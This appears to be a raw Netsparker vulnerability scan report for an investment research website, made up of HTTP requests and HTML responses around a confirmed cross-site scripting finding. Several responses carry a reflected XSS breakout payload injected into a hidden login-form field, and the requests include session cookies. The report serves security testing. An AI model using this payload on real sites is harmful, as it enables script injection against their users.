<td align="left" valign="top"><font color="#666666" size="1" face="Verdana, Arial, Helvetica, sans-serif">&copy;2011 Stansberry & Associates Investment Research. All Rights Reserved. Protected by copyright laws of the United States and international treaties. This website may only be used pursuant to the subscription agreement and any reproduction, copying, or redistribution (electronic or otherwise, including on the world wide web), in whole or in part, is strictly prohibited without the express written permission of Stansberry & Associates Investment Research, LLC. 1217 Saint Paul Street, Baltimore MD 21202. </font> </td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr width="800" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center">
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/">Home</a> | <a href="/editors.asp">Meet the Editors</a> | <a href="/news.asp">News & Events</a> | <a href="http://www.stansberryresearch.com/pub/psi/free_reports.html" target="_blank">Media &amp; Interviews</a> | <a href="/schedule.asp">Publishing Schedule</a> | <a href="/contact.asp">Contact Us</a> | <a href="/customer_service.asp">Customer Service</a><a href="/privacy.asp"><br>
</a> <a href="/pub/pal">The S&A Alliance</a> | <a href="/pub/sug">True Wealth Alliance</a> | <a href="/pub/pwa">Private Wealth Alliance</a> <br>
<a href="/pub/digest/">S&amp;A Digest</a> | <a href="http://www.dailywealth.com" target="_blank" title="DailyWealth Investment Newsletter">DailyWealth</a> | <a href="http://www.growthstockwire.com" target="_blank" title="Growth Stock Wire Investment Newsletter">Growth Stock Wire</a> | <a href="http://www.thedailycrux.com/" target="_blank">The Daily Crux<br />
</a></font><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/privacy.asp">Privacy Policy</a><br>
</font></p>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr align="center" width="300" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td height="21" align="left" valign="top"><div align="center"><a href="/"><strong><img src="/images/sa_logo.gif" alt="Stansberry & Associates Investment Research" width="198" height="39" border="0"></strong></a></div></td>
</tr>
</table>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-235360-4");
pageTracker._initData();
pageTracker._trackPageview();
</script>

<!-- Google Code for S&amp;A Remarketing List -->
<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1068007774;
var google_conversion_language = "en";
var google_conversion_format = "3";
var google_conversion_color = "666666";
var google_conversion_label = "AVdACPaJ0QEQ3oKi_QM";
var google_conversion_value = 0;
/* ]]> */
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1068007774/?label=AVdACPaJ0QEQ3oKi_QM&amp;guid=ON&amp;script=0"/>
</div>
</noscript>
<!-- Advertiser 'Stansberry & Associates', Include user in segment '2011 DWP - Stansberry Retargeting Pixel' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ads.bluelithium.com/pixel?id=1539896&t=2" width="1" height="1" />
<!-- End of segment tag -->
</body>
</html>

Identification Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:45:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 29366
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Stansberry Investment Research</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="Meet the editors from Stansberry and Associates Investment Research. Discover the range of investment strategies used by our team of experts">
<meta name=""keywords"" content=""cheap stocks, stocks to buy, discount stock, investment value, safe investments, Icelandic bonds
,gold coins, stansberry investment research"">
<meta name="copyright" content=" �2008 Stansberry & Associates Investment Research ">
<meta name="ROBOTS" content="ALL">
<link rel="stylesheet" href="/includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/cover";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="/pub/digest/archive/2008/html/fda_essays/'"--></style></script><script>netsparker(0x002A72)</script>">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>
<TABLE id=main cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td width="189" rowspan="3" align="left" valign="top" bgcolor="#FFFFFF">
<table width="183" border="0" align="left" cellpadding="1" cellspacing="0">
<tr align="left" valign="top">
<td colspan="2"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong><img src="/images/premium_sub_head.gif" alt="Premium Products" width="183" height="19"></strong></font></td>
</tr>
<tr align="left" valign="top">
<td width="2%">&nbsp;</td>
<td width="98%"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/trw/index.asp">True Wealth</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/psi/index.asp">Stansberry's Investment Advisory</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/oil/index.asp">S&A Resource Report</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/btr/index.asp">Advanced Income</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/twp/index.asp">The 12% Letter</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/dil/index.asp">Phase 1 Investor</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/evi/index.asp">Extreme Value</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/shr/index.asp">S&A Short Report</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/tin/index.asp">True Income</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/rem/index.asp">Retirement Millionaire</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/rtr/index.asp">Retirement Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pst/index.asp">Penny Stock Specialist</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/jrt/index.asp">Junior Resource Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/gra/index.asp">S&A Grail Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/tws/index.asp">True Wealth Systems</a></font></td>
</tr>

<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/digest/index.asp"><strong>The S&A Digest</strong></a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif">- <a href="/pub/digest/archive/index.asp">Public Archive</a></font></td>
</tr>
<tr align="left" valign="top">
<td colspan="2"><img src="/images/white_fill.gif" width="1" height="10"></td>
</tr>

<tr align="left" valign="top">
<td colspan="2"><img src="/images/white_fill.gif" width="1" height="1"></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.dailywealth.com" target="new window">DailyWealth</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.growthstockwire.com" target="new window">Growth Stock Wire</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.thedailycrux.com" target="new window">The Daily Crux</a></font></td>
</tr>
<tr align="left" valign="top">
<td colspan="2"><img src="/images/white_fill.gif" width="1" height="10"></td>
</tr>
<tr align="left" valign="top">
<td colspan="2"><strong><img src="/images/lifetime_sub_head.gif" alt="Lifetime Memberships" width="183" height="19"></strong></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pal/index.asp">The S&A Alliance</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pwa/index.asp">Private Wealth Alliance</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>
</table>

</td>
<TD WIDTH="1" rowspan="3" BGCOLOR="#cccccc"><IMG SRC="1-1.gif" WIDTH="1"
HEIGHT="1"></TD>
<td width="9" rowspan="3" align="left" valign="top" bgcolor="#FFFFFF"><div align="left"> </div></td>
<td width="371" align="left" valign="top" bgcolor="#FFFFFF"><IMG SRC="1-1.gif" WIDTH="1"
HEIGHT="1"><img src="http://www.stansberryresearch.com/secure/images/digest_title_sm.gif" alt="Meet The Editors" widt..
- /pub/mdp/

/pub/mdp/ CONFIRMED

Injection URL

http://www.stansberryresearch.com/responses/sign_in_error.asp

Injection Request

GET /responses/sign_in_error.asp HTTP/1.1
Referer: http://www.stansberryresearch.com/pub/digest/archive/2008/html/fda_essays.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=GEPNLMLBKNENIJCFCEJJFONJ; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=HMFBMFABKIKCAIHLCIOCILBL
Accept-Encoding: gzip, deflate

Identification Request

GET /pub/mdp/ HTTP/1.1
Referer: http://www.stansberryresearch.com/pub/mdp/index.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=GEPNLMLBKNENIJCFCEJJFONJ; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=HMFBMFABKIKCAIHLCIOCILBL
Accept-Encoding: gzip, deflate

Injection Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:45:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 12205
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Stansberry & Associates Investment Research</title>
<link rel="stylesheet" href="/includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/cover";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="/pub/digest/archive/2008/html/fda_essays/'"--></style></script><script>netsparker(0x002A72)</script>">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>
<TABLE id=main cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>

<div align="center">
<P align=center class="mid_font"><B>Please Log In </B></P>
<table width="42%" border="0" cellspacing="0" cellpadding="2">
<tr align="left" valign="top">
<td><u><span class="mid_font"><FONT color=#990000><FONT
color=#666666><font color="#000000"><B>Remember:</B></font></FONT></FONT></span></u></td>
</tr>

</table>
<P align=center class="mid_font">You must have an S&amp;A subscription to access this section. <BR>
To learn more about our publications, visit our <a href="/">home page</a>. </P>
<P align=center class="mid_font">If you are already a subscriber, check your user name and password and try logging in again. <br>
Or contact customer service at 1-888-261-2693.<font color="#FF0000"><strong> </strong></font></P>
<P align=center class="mid_font">Thank you.</P>
<P align=center class="mid_font"><FONT color=#990000><B><FONT
color=#666666><BR>
</FONT></B></FONT></P>
</div>

</td>
</tr>
</table>
<TABLE cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2><img src="/images/bottom_border.gif" width="798" height="24"></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td align="left" valign="top"><font color="#666666" size="1" face="Verdana, Arial, Helvetica, sans-serif">&copy;2011 Stansberry & Associates Investment Research. All Rights Reserved. Protected by copyright laws of the United States and international treaties. This website may only be used pursuant to the subscription agreement and any reproduction, copying, or redistribution (electronic or otherwise, including on the world wide web), in whole or in part, is strictly prohibited without the express written permission of Stansberry & Associates Investment Research, LLC. 1217 Saint Paul Street, Baltimore MD 21202. </font> </td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr width="800" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center">
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/">Home</a> | <a href="/editors.asp">Meet the Editors</a> | <a href="/news.asp">News & Events</a> | <a href="http://www.stansberryresearch.com/pub/psi/free_reports.html" target="_blank">Media &amp; Interviews</a> | <a href="/schedule.asp">Publishing Schedule</a> | <a href="/contact.asp">Contact Us</a> | <a href="/customer_service.asp">Customer Service</a><a href="/privacy.asp"><br>
</a> <a href="/pub/pal">The S&A Alliance</a> | <a href="/pub/sug">True Wealth Alliance</a> | <a href="/pub/pwa">Private Wealth Alliance</a> <br>
<a href="/pub/digest/">S&amp;A Digest</a> | <a href="http://www.dailywealth.com" target="_blank" title="DailyWealth Investment Newsletter">DailyWealth</a> | <a href="http://www.growthstockwire.com" target="_blank" title="Growth Stock Wire Investment Newsletter">Growth Stock Wire</a> | <a href="http://www.thedailycrux.com/" target="_blank">The Daily Crux<br />
</a></font><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/privacy.asp">Privacy Policy</a><br>
</font></p>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr align="center" width="300" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td height="21" align="left" valign="top"><div align="center"><a href="/"><strong><img src="/images/sa_logo.gif" alt="Stansberry & Associates Investment Research" width="198" height="39" border="0"></strong></a></div></td>
</tr>
</table>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-235360-4");
pageTracker._initData();
pageTracker._trackPageview();
</script>

<!-- Google Code for S&amp;A Remarketing List -->
<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1068007774;
var google_conversion_language = "en";
var google_conversion_format = "3";
var google_conversion_color = "666666";
var google_conversion_label = "AVdACPaJ0QEQ3oKi_QM";
var google_conversion_value = 0;
/* ]]> */
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1068007774/?label=AVdACPaJ0QEQ3oKi_QM&amp;guid=ON&amp;script=0"/>
</div>
</noscript>
<!-- Advertiser 'Stansberry & Associates', Include user in segment '2011 DWP - Stansberry Retargeting Pixel' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ads.bluelithium.com/pixel?id=1539896&t=2" width="1" height="1" />
<!-- End of segment tag -->
</body>
</html>

Identification Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:45:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 22947
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Monthly Dividend Program Investment Training</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="The Monthly Dividend Program is and investment research course that provides detailed insight on dividend paying stocks.">
<meta name="keywords" content="dividend investing, dividend funds, stock market investment training, dividend trading, dividend stock, investment training, dividend shares, investment research, monthly dividends">
<meta name="copyright" content=" �2008 Stansberry & Associates Investment Research ">
<meta name="ROBOTS" content="ALL">
<link rel="stylesheet" href="/includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/pub/mdp";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
